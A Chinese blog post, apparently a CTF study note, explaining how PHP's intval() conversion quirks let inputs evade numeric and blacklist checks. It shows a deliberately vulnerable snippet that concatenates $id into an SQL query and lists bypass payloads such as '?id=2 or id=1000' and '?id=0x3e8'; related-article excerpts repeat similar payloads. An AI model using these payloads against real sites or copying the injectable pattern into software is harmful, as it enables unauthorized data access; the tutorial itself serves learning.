intval()函数绕过

最新推荐文章于 2024-07-12 11:47:12 发布
最新推荐文章于 2024-07-12 11:47:12 发布
阅读量804 收藏 6
点赞数 2
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/krafcc/article/details/134173212
版权

intval()

 int intval ( mixed $var [, int $base = 10 ] )

函数作用:获取变量的整数值

0x:16 0:8 0b:2 默认10

科学计数法绕过

当函数中用字符串方式表示科学计数法时,函数的返回值是科学计数法前面的一个数,而对于科学计数法加数字则会返回科学计数法的数值

 echo intval(1e10);              // 1410065408
 echo intval('1e10');            // 1
 echo intval('1e10'+1);          // 1410065409

应用场景:

 if (intval($_GET['lover']) < 2023 && intval($_GET['lover'] + 1) > 2024)

进制绕过

当某个数字被过滤时,可以使用它的 8进制/16进制来绕过。

当 base 为空时,默认值是 0,会根据 $var 的格式来调整转换的进制。

  • 如果 $var 以 0 开头,就使用 8进制

  • 如果 $var 以0x开头,就使用 16进制

  • 否则,就使用 10进制

转换字符串特性绕过

  • 如果以数字开头,就返回1个或多个连续的数字

  • 如果以字母开头,就返回0

 if(intval($id) > 999){
         # id 大于 999 直接退出并返回错误
         die("id error");
     }else{
         # id 小于 999 拼接sql语句
         $sql = "select * from article where id = $id order by id limit 1 ";
 <!-- flag in id = 1000 -->

payload:?id=2 or id=1000

数组绕过

intval() 转换数组类型时,不关心数组中的内容,只判断数组中有没有元素,有为1无为0

三种数组写法:

 $a[]=1;
      
 $a=array(1,2);
      
 $a=[1,2];

但在传参时一般使用第一种形式,经过测试发现,传参默认都是字符串类型,根据intval的字符串转换规则,如果字符串第一个字符不是数字就会直接返回0,所以后面两种形式都是返回0,只有第一种可以正确返回数字1

image-20231101235921465

取反~绕过

当某个数字被过滤时,可以两次取反来绕过

 var_dump(intval(~10));  \\ -11
 var_dump(intval(~~10)); \\ 10

算数运算符绕过

当某个数字被过滤时,可以使用算数运算符绕过

 var_dump(intval(5*5));
 var_dump(intval(5+5));
 var_dump(intval(05+5));

输出:

 int(25)
 int(10)
 int(10)

SQL注入intval()函数绕过黑名单方法

 #flag in id=1000
 if(preg_match("/or|\-|\\|\*|\<|\>|\!|x|hex|\+/i",$id)){
     die("id error");
 } 
 if(intval($id) > 999){
     die("id error");
 }
 else{
         # id 小于 999 拼接sql语句
         $sql = "select * from article where id = $id order by id limit 1 ";
 }
 根据黑名单的不同,访问?id=1000有以下几种方法:
 ?id='1000' //"1000"或(1000)皆可
 ?id=125<<3 //左移
 ?id=680|320 //按位或
 ?id=992^8 //按位异或
 ?id=~~1000 //两次取反
 ?id=0x3e8 //十六进制
 ?id=0b1111101000 //二进制
krafcc
关注
php intval绕过 注入,PHP代码审计片段讲解(入门代码审计、CTF必备)
weixin_36290287的博客
04-12 1826
关于本项目代码审计对于很多安全圈的新人来说,一直是一件头疼的事情,也想跟着大牛们直接操刀审计CMS?却处处碰壁:函数看不懂!漏洞原理不知道!PHP特性更不知!那还怎么愉快审计?不如化繁为简,跟着本项目先搞懂PHP中大多敏感函数与各类特性,再逐渐增加难度,直到可以吊打各类CMS~本项目讲解基于多道CTF题,玩CTF的WEB狗也不要错过(^-^)V题的源码在Github: bowu (Github),...
WEB攻防基础|PHP|过滤函数intval()绕过原理及方法
m0_73615178的博客
12-19 1759
intval()函数绕过方法思路总结: 一、进制类型转换: 二、弱比较(a==b),可以给a、b两个参数传入数组,使弱比较为true: 三、增加小数位: 四、转换字符串: 五、取反: 六、运用算数运算符:
绕过intval( )
东隅的博客
01-19 3093
绕过方法有很多,比如: ?id='1000' //"1000"或(1000)皆可 ?id=125<<3 //左移 ?id=680|320 //按位或 ?id=992^8 //按位异或 ?id=~~1000 //两次取反 ?id=0x3e8 //十六进制 ?id=0b1111101000 //二进制 这里讲一下?id='1000'(ps: ?id=1000就是不行的) intval('1000')>999的结果确实是True, 但是别忘了还有一个GET提交过程,问题出在这里,原理大概
PHP intval()函数详解,intval()函数漏洞原理及绕过思路
热门推荐
wangyuxiang946的博客
06-17 2万+
intval() 函数可以获取变量的「整数值」。常用于强制类型转换。 进制自动转换 转换数组 转换小数 转换字符串 取反~ 算数运算符 浮点数精度缺失问题 intval()绕过思路
基于intval()函数特性的漏洞绕过
rev1ve的博客
08-18 704
最近在做ctf.show的时候碰到intval()函数,结合特性绕过
ctfshow-web入门-php特性(web89-web95)intval 函数绕过
最新发布
Welcome To Myon'Blog !
07-12 953
如果第一次匹配成功,再次使用正则表达式匹配 $a 是否等于字符串“php”,但这次只有不区分大小写,是单行模式,不会匹配多行,如果第二次没有匹配成功就会输出 flag。也就是说,如果 num 中不包含数字 "0" 就会终止程序,但是还有一种情况,如果这个 0 出现在开头,虽然是找到了有 0 这个字符,但是返回位置为 0 ,if (!== 是相等运算符,在进行比较时,会先将字符串类型转化成相同,再比较,比如比较一个数字和字符串或者比较涉及到数字内容的字符串,字符串会被转换成数值并按照数值来进行比较。
intval md5绕过之[WUSTCTF2020]朴实无华
qq_58970968的博客
07-24 1163
intval函数还可以用于判断回文串,因为intval函数的最大值取决于操作系统,如果字符串的回文超过了最大的范围值,那么返回的值就也是原来的字符串,就会变成回文串,实现了绕过函数的使用方法,当函数中用字符串方式表示科学计数法时,函数的返回值是科学计数法前面的一个数,而对于科学计数法加数字则会返回科学计数法的数值。$a==md5($a)时使用科学计数0e215962017。可以使用0e开头的科学计数来绕过,使用。扫描文件发现robots.txt;==bmd值要相等;使用工具,或者数组;...
PHP黑魔法之intval绕过
Thewei666的博客
05-15 512
当 op 字符串长度大于 1 时或者长度等于 1 且这个字符不是 0 时,条件判断为真由此可以得出:空字符、"0" 和 0 作为条件判断时都等同于 false。
ctfshow-萌新-web2( 利用intval函数特性配合SQL的特殊符号获取敏感数据 )_intvaluectf
2401_84264244的博客
05-02 17
页面中给出了源码,并提示我们 id=1000时,即可获取flag这里有两个关键点,首先是intval()函数的转换,我们可以利用intval函数转换字符串时的特性,来绕过校验,输入一下payload,即可获取flag?id=2*500intval()函数转换整数类型使,会原样转换;而转化字符串类型时( get请求获取的参数都是字符串类型)会从第一个字符开始转换,直到遇到不是数字的字符才会停止转换。
php intval函数用法总结
10-17
在本篇内容里小编给大家总结了关于php intval函数用法以及相关知识点总结,需要的朋友们跟着学习下。
intval绕过和chr的利用
https://www.cnblogs.com/zpchcbd/
05-02 3810
题目 <?php error_reporting(0); $flag = 'OKOKOKOK' //老样子 自定义一个flag $value = $_GET['value']; //接受value参数 $password = $_GET['password']; //接受get参数 $username = ''; for ($i = 0; $i < count($value);...
php intval绕过,PHP intval函数安全应用技巧
weixin_39813200的博客
03-22 1728
我们学习一、PHP intval函数描述intval函数有个特性:"直到遇上数字或正负符号才开始做转换,再遇到非数字或字符串结束时()结束转换",在某些应用程序里由于对intval函数这个特性认识不够,错误的使用导致绕过一些安全判断导致安全漏洞.二、PHP intval函数分析PHP_FUNCTION(intval){zval **num, **arg_base;int base;switch (...
SQL注入intval()函数绕过黑名单方法
weixin_53498616的博客
03-16 1131
if(intval($id) > 999){ die("id error")}; 上面的源码想访问id=1000时有以下几种方法: id='1000' id="1000" id=125<<3(左移) id=680|320(按位或) id=992^8(按位异或) id=~~1000(取反) id=0x3e8(十六进制) id=0b1111101000(二进制) ...
php intval绕过,php内置函数intval使用不当的安全漏洞分析
weixin_29346059的博客
03-22 342
php内置函数intval使用不当的安全漏洞分析 php内置函数intval()使用不当的安全漏洞分析 一、描述 intval函数有个特性:“直到遇上数字或正负符号才开始做转换,再遇到非数字或字符串结束时(\0)结束转换“,在某些应用程序里由于对intval函数这个特性认识不够,错误的使用导致绕过一些安全判断导致安全漏洞. 二、分析 PHP_FUNCTION(intval) { zval **nu...
[WUSTCTF 2020]朴实无华:PHP 下的 intval 绕过技巧
两个月亮
09-29 3231
在 PHP7.2.5 以下的某个版本以前,intval() 函数无法正确解析字符 E 或 e,于是 intval 在解析到 E 或 e 时立即停止,这导致科学计数法实际并未生效。intval() 在 PHP7.2.5 及以上版本 中的表现符合预期,与我们对科学计数法的认知相符。intval() 函数 在 PHP7.2.5 以下的某个版本以前(仅测试了 PHP7.2.5 与 PHP7.0.0,PHP7.0.0 中,intval() 的表现存在异常,而在 PHP7.2.5 则表现正常。) 表现异常。
MD5加密相等绕过intval函数四舍五入
giun的博客
04-19 1708
一、MD5加密相等绕过 <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else { echo ...
39. 注入篇——绕过防注入继续注入
Fly_鹏程万里
03-10 1084
前言在很多情况下,我们好不容易发现了可能注入的注入点,但是却由于各种的过滤机制使得我们的注入语句无法执行,这使得我们最后无法拿下网站的administrator权限,本小节我们就讲解一些绕过各种防注入过滤措施的方法!普通的WEB站点的绕过(1)使用编码技术通过URLEncode编码、ASCII编码绕过。例如:or 1=1 即:%6f%72%20%31%3d%31,而Test也可以为CHAR(101...
intval函数
05-24
intval函数是一个PHP函数,用于将变量转换为整数。如果变量是浮点数,则将其四舍五入为最接近的整数。如果变量是字符串,则尝试将其解析为整数。如果变量是布尔值,则将其转换为0或1。如果变量是数组或对象,则返回0。下面是一个示例: ``` $num = "123"; $int_num = intval($num); echo $int_num; // 输出 123 ``` 在上面的示例中,变量$num是一个字符串,它被传递给intval函数,该函数将其解析为整数并将其赋值给$int_num变量。最后,使用echo语句将$int_num变量的值输出到屏幕上。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值